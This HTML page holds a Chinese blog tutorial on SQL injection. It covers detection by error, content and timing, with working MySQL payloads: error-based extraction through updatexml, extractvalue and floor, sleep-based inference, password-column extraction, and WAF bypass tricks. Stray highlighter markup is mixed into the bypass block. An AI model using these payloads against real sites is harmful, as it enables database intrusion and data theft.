<!DOCTYPE html>
<html lang="zh-Hans">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Bywalks">



    <meta name="description" content="Bywalks个人博客(www.bywalks.com)关注网络安全、信息安全、网站建设、IT行业、网络安全文章、黑客技术、网络安全技术、网络安全知识、互联网安全知识、原创网络安全博客">


    <meta name="keywords" content="Bywalks个人博客,关注网络安全,信息安全,网站建设,安全博客,web安全,网站漏洞,网络安全,网络安全技术,网络安全知识,网络安全教程">


<title>浅谈SQL注入 | Bywalks&#39;s Blog - Bywalks个人博客|网络安全爱好者</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 6.0.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Bywalks&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Bywalks&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">浅谈SQL注入</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">Bywalks</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">September 30, 2017&nbsp;&nbsp;0:00:00</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a><span style="color: #008000;">前言</span></h2><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">在开始之前我先谈谈我对SQL 注入的三种分类，看过很多文章，每个人基于不同的原理把SQL注入分为很多类，在这其中，我最赞成的是<strong>SQL注入与防御</strong>中的那种分类方法。上面<strong>把SQL注入分为这三类：基于错误，基于时间，基于内容。</strong>这同时也是我最赞成的观点。下面的一些叙述都是按照这三个类别来分别叙述的</span></p>
<h2 id="如何判断SQL-注入"><a href="#如何判断SQL-注入" class="headerlink" title="如何判断SQL 注入"></a><span style="color: #008000;">如何判断SQL 注入</span></h2><p><strong><span style="font-family: 微软雅黑, 'Microsoft YaHei';">判断 是否是注入 总的思路在于参数后面的内容我们是否可以控制</span></strong></p>
<p><strong><span style="font-family: 微软雅黑, 'Microsoft YaHei';">我认为注入分为这三类，那么判断当然也按照这三类的思路。</span></strong></p>
<ul>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">基于错误：当我们在参数后面加个单引号，例如id&#x3D;1’  可能页面会报错，是直接显示出数据库错误的那种报错。那么可能这里就是一个注入点</span></p>
</li>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">基于内容：用基于内容的思路来判断，就是看参数后的内容我们是否可控制，当我们用id&#x3D;1可以获取一个数据页面的时候，我们可以修改一下参数，我们用id&#x3D;2-1,或者id&#x3D;0+1（+号需要编码,%2b）~2B..来试一试，看看返回的页面的内容是不是跟我们id&#x3D;1返回的内容一致,如果返回的内容一致，那么说明id后面的参数我们是可以控制的，那么也说明这是一个注入点</span></p>
</li>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">基于时间：我们一样用id&#x3D;1来讨论一下吧，如果我们在id&#x3D;1后面加上一段代码，例如这样and if(1&#x3D;1,sleep(5),1) ，这是一段if语句，就是如果1&#x3D;1，则延迟5秒，否则返回1，那么当我们要访问的页面过了一段时间才可以被访问，这就说明了这是个注入点，我们在id&#x3D;1后面有可以控制的参数</span></p>
</li>
</ul>
<h2 id="获得我们想要数据的思路"><a href="#获得我们想要数据的思路" class="headerlink" title="获得我们想要数据的思路"></a><span style="color: #008000;">获得我们想要数据的思路</span></h2><ul>
<li><span style="font-family: 微软雅黑, 'Microsoft YaHei';">基于错误：个人认为基于错误是最简单的，因为他会返回数据库中的错误信息，来让我们省下很多时间，如果可以order by等 ，这些那么就更简单了。</span></li>
</ul>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">下面提供一些报错语句：</span></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">通过floor()报错：</span><br><span class="line"></span><br><span class="line">http://localhost/index.php?name=&#x27;+or+(select+1+from(select+count(*),concat(user(),0x7e,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+%23&amp;pass=1</span><br><span class="line"></span><br><span class="line">通过extractvalue()报错：</span><br><span class="line"></span><br><span class="line">http://localhost/index.php?name=&#x27;+or+extractvalue(1,concat(user(),0x7e,version()))+%23&amp;pass=1</span><br><span class="line"></span><br><span class="line">通过updatexml()报错：</span><br><span class="line"></span><br><span class="line">http://localhost/index.php?name=&#x27;+or+updatexml(1,concat(user(),0x7e,version()),1)+%23&amp;pass=1</span><br><span class="line"></span><br><span class="line">通过exp()报错：</span><br><span class="line"></span><br><span class="line">http://localhost/index.php?name=&#x27;+or+EXP(~(SELECT * from(select user())a))+%23&amp;pass=1 通过NAME_CONST(适用于低版本)报错：</span><br><span class="line"></span><br><span class="line">http://localhost/index.php?name=&#x27;+or+(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)+%23&amp;pass=1</span><br></pre></td></tr></table></figure>

<ul>
<li><p><span style="font-family: 'comic sans ms', sans-serif;">基于内容：当我们遇到这种id&#x3D;1,我们可以用id&#x3D;2-1来获得相同页面的时候，我们可以这样构造语句，id&#x3D;2-1&#x2F;(if(user&#x3D;’root’),1,0),当user是root的时候，if函数返回的值为1，id的值也就是1,返回的页面也就相同，当user不是root，if函数返回的值就是0，2-0&#x3D;2，返回的页面跟我们id&#x3D;1的页面是不同的，user&#x3D;’root’也就是我们可以修改数据来判断的地方</span></p>
</li>
<li><p><span style="font-family: 'comic sans ms', sans-serif;">基于时间：基于时间是最花费时间的，因为我们用基于时间的时候时间是不可以设置太小的，例如sleep(2)，只延迟2秒。</span></p>
</li>
</ul>
<p><span style="font-family: 'comic sans ms', sans-serif;">如果网站访问速度本来就不是怎么快的话，会影响我们对数据的判断的。</span></p>
<p><span style="font-family: 'comic sans ms', sans-serif;">基于时间的找我们可以修改数据的方法是在函数后面加判断语句，</span></p>
<p><span style="font-family: 'comic sans ms', sans-serif;">我们可以在函数后面加if(user&#x3D;’root’,sleep(5),1),这样当user&#x3D;’root’的时候，就会延迟5秒，那么我们也就可以慢慢来判断我们需要的数据了 </span></p>
<p><strong><span style="font-family: 'comic sans ms', sans-serif;">总的来说：就选择上面</span></strong></p>
<p><strong><span style="font-family: 'comic sans ms', sans-serif;"> 基于错误 &gt; 基于内容 &gt; 基于时间 </span></strong></p>
<p><span style="font-family: 'comic sans ms', sans-serif;">毕竟基于时间的方法是花费最久的，但是当前两个方法都不可用，也就是报错统一404，返回内容统一一个页面(可是是过滤了敏感参数)的时候，这时候如果是一个注入点，我们就只能用基于时间的方法了。</span></p>
<h2 id="绕过防御"><a href="#绕过防御" class="headerlink" title="绕过防御"></a><span style="color: #008000;">绕过防御</span></h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line">内联注释：</span><br><span class="line"></span><br><span class="line">id=1&lt;span class=&quot;hljs-comment&quot;&gt;/*!UnIoN*/&lt;/span&gt;+&lt;span class=&quot;hljs-keyword&quot;&gt;SeLeCT&lt;/span&gt;+&lt;span class=&quot;hljs-number&quot;&gt;1&lt;/span&gt;,&lt;span class=&quot;hljs-number&quot;&gt;2&lt;/span&gt;,&lt;span class=&quot;hljs-keyword&quot;&gt;concat&lt;/span&gt;(&lt;span class=&quot;hljs-comment&quot;&gt;/*!table_name*/&lt;/span&gt;)+&lt;span class=&quot;hljs-keyword&quot;&gt;FrOM&lt;/span&gt; &lt;span class=&quot;hljs-comment&quot;&gt;/*information_schema*/&lt;/span&gt;.&lt;span class=&quot;hljs-keyword&quot;&gt;tables&lt;/span&gt; &lt;span class=&quot;hljs-comment&quot;&gt;/*!WHERE */&lt;/span&gt;+&lt;span class=&quot;hljs-comment&quot;&gt;/*!TaBlE_ScHeMa*/&lt;/span&gt;+&lt;span class=&quot;hljs-keyword&quot;&gt;like&lt;/span&gt;+&lt;span class=&quot;hljs-keyword&quot;&gt;database&lt;/span&gt;()&lt;span class=&quot;hljs-comment&quot;&gt;-- - &lt;/span&gt;</span><br><span class="line"></span><br><span class="line">编码绕过：</span><br><span class="line"></span><br><span class="line">如URLEncode编码，ASCII,HEX,unicode编码绕过</span><br><span class="line"></span><br><span class="line">空格绕过：</span><br><span class="line"></span><br><span class="line">两个空格代替一个空格，用Tab代替空格 %20 %09 %0a %0b %0c %0d %a0 /**&lt;span class=&quot;hljs-regexp&quot;&gt;/ &lt;/span&gt;</span><br><span class="line"></span><br><span class="line">&lt;span class=&quot;hljs-regexp&quot;&gt;括号绕过空格 在MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来 select(user())from dual where 1=1 and 2=2;&lt;/span&gt;</span><br><span class="line"></span><br><span class="line">&lt;span class=&quot;hljs-regexp&quot;&gt;换行符绕过：&lt;/span&gt;</span><br><span class="line"></span><br><span class="line">&lt;span class=&quot;hljs-regexp&quot;&gt;%0a、%0d&lt;/span&gt;</span><br><span class="line"></span><br><span class="line">&lt;span class=&quot;hljs-regexp&quot;&gt;宽字节绕过： &lt;/span&gt;</span><br><span class="line"></span><br><span class="line">&lt;span class=&quot;hljs-regexp&quot;&gt;过滤单引号时，可以试试宽字节 %bf%27 %df%27 %aa%27&lt;/span&gt;</span><br><span class="line"></span><br><span class="line">&lt;span class=&quot;hljs-regexp&quot;&gt;反引号`绕过：&lt;/span&gt;</span><br><span class="line"></span><br><span class="line">&lt;span class=&quot;hljs-regexp&quot;&gt;&lt;span class=&quot;hljs-keyword&quot;&gt;select&lt;/span&gt; &lt;span class=&quot;hljs-string&quot;&gt;`version()`&lt;/span&gt;，可以用来过空格和正则，特殊情况下还可以将其做注释符用 &lt;/span&gt;</span><br><span class="line"></span><br><span class="line">&lt;span class=&quot;hljs-regexp&quot;&gt;等价函数绕过： &lt;/span&gt;</span><br><span class="line"></span><br><span class="line">hex()、bin() ==&gt; ascii()</span><br><span class="line"></span><br><span class="line">sleep() ==&gt;benchmark()</span><br><span class="line"></span><br><span class="line">concat_ws()==&gt;group_concat() mid()、substr() ==&gt; substring()</span><br><span class="line"></span><br><span class="line">@@user ==&gt; user() @@datadir ==&gt; datadir()</span><br><span class="line"></span><br><span class="line">举例：substring()和substr()无法使用时：?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74</span><br><span class="line"></span><br><span class="line">或者：</span><br><span class="line"></span><br><span class="line">substr((select &#x27;password&#x27;),1,1) = 0x70</span><br><span class="line"></span><br><span class="line">strcmp(left(&#x27;password&#x27;,1), 0x69) = 1</span><br><span class="line"></span><br><span class="line">strcmp(left(&#x27;password&#x27;,1), 0x70) = 0</span><br><span class="line"></span><br><span class="line">strcmp(left(&#x27;password&#x27;,1), 0x71) = -1</span><br></pre></td></tr></table></figure>
        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>Bywalks</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://bywalks.com/2017/09/30/%E6%B5%85%E8%B0%88sql%E6%B3%A8%E5%85%A5/">http://bywalks.com/2017/09/30/%E6%B5%85%E8%B0%88sql%E6%B3%A8%E5%85%A5/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2022 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"># 网络安全</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2017/10/02/python3-study-01/">Python3学习系列（一）：Scrapy在Python3环境下的安装</a>
            
            
            <a class="next" rel="next" href="/2017/09/30/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AE%9E%E9%AA%8C%E5%AE%A4%E6%94%BB%E7%95%A5%E3%80%90%E8%84%9A%E6%9C%AC%E5%85%B3%E6%B3%A8%E5%85%A5%E5%85%B3%E3%80%91/">网络安全实验室攻略【脚本关+注入关】</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© Bywalks | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span></span>
    </div>
</footer>

    </div>
</body>

</html>